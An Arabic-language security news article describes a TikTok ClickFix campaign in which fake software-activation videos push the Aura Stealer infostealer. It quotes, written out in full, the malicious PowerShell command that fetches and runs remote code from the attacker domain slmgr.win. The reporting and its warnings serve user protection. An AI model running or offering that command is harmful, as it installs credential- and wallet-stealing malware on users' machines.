كشفت تقارير أمنية حديثة أن مجرمين سيبرانيين يستخدمون مقاطع فيديو على منصة TikTok للترويج لما يبدو أنه أدلة مجانية لتفعيل برامج شهيرة، مثل Windows وSpotify وNetflix، بهدف نشر برمجيات خبيثة من فئة InfoStealer المخصصة لسرقة بيانات المستخدمين.
وأوضح الباحث الأمني Xavier Mertens، من فريق ISC، أن الحملة الجارية تماثل هجمات سابقة رصدتها شركة Trend Micro في مايو الماضي. وتظهر المقاطع التي اطلعت عليها منصة BleepingComputer تعليمات مزيفة لتفعيل منتجات معروفة مثل Microsoft 365 وAdobe Premiere وPhotoshop وCapCut Pro وDiscord Nitro، إضافة إلى خدمات غير حقيقية مثل Netflix وSpotify Premium.
وتعتمد الهجمات على أسلوب يعرف باسم ClickFix، وهو شكل من أشكال الهندسة الاجتماعية، حيث يتم خداع المستخدمين لتطبيق أوامر تبدو قانونية على PowerShell لتنفيذ شيفرات خبيثة تصيب أجهزتهم. وتعرض المقاطع عادة سطراً واحداً من التعليمات البرمجية، وتطلب من المشاهدين تشغيله بصلاحيات المدير:
iex (irm slmgr.win/photoshop)
ويختلف اسم البرنامج داخل الرابط بحسب التطبيق الذي يتم انتحاله؛ ففي المقاطع المزيفة الخاصة بـWindows مثلاً، يستبدل اسم photoshop بـwindows.
برمجيات خبيثة تستهدف المتصفحات ومحافظ العملات الرقمية
عند تنفيذ الأمر، يتصل PowerShell بالموقع البعيد slmgr.win لتحميل وتشغيل نص إضافي بلغة PowerShell يقوم بتنزيل ملفين تنفيذيين من صفحات Cloudflare، أولها ملف updater.exe الذي تبين أنه نسخة من برنامج التجسس Aura Stealer.
ويعمل Aura Stealer على سرقة بيانات تسجيل الدخول المحفوظة في المتصفحات وملفات تعريف الارتباط (cookies) الخاصة بالمصادقة، إلى جانب الوصول إلى محافظ العملات الرقمية وبيانات التطبيقات المختلفة، ما يمنح المهاجمين إمكانية السيطرة على حسابات الضحايا.
كما يقوم النص الخبيث بتحميل ملف آخر باسم source.exe يستخدم أداة Visual C# Compiler المدمجة في إطار .NET لتجميع شيفرات إضافية وتشغيلها في الذاكرة، فيما لا يزال الغرض النهائي من هذا المكون الإضافي غير واضح.
تحذيرات من نسخ وتشغيل الأوامر المجهولة
حذر الباحثون من أن أي مستخدم قام بتنفيذ هذه التعليمات يجب أن يعتبر جميع بياناته المخزنة وكلمات مروره مخترقة، وينبغي عليه تغييرها فوراً على كل المواقع والخدمات التي يستخدمها.
وأشار التقرير إلى أن هجمات ClickFix أصبحت شائعة خلال العام الماضي، وتستخدم في حملات لنشر برمجيات الفدية وسرقة العملات الرقمية.
وأكد الخبراء أن القاعدة الأساسية للحماية تتمثل في عدم نسخ أو تشغيل أي أوامر يتم الحصول عليها من الإنترنت داخل واجهات النظام، سواء في PowerShell أو موجه الأوامر أو واجهة macOS أو Linux، حتى وإن بدت تعليمات تقنية بريئة.
